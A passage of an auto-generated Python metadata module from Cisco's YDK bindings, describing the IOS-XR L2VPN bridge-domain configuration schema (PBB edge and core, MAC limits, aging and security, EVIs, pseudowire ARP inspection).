[], [],
''' PBB Static Mac Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Accept Virtual instance port to be
shutdown on mac violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
''' PBB Static Mac Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
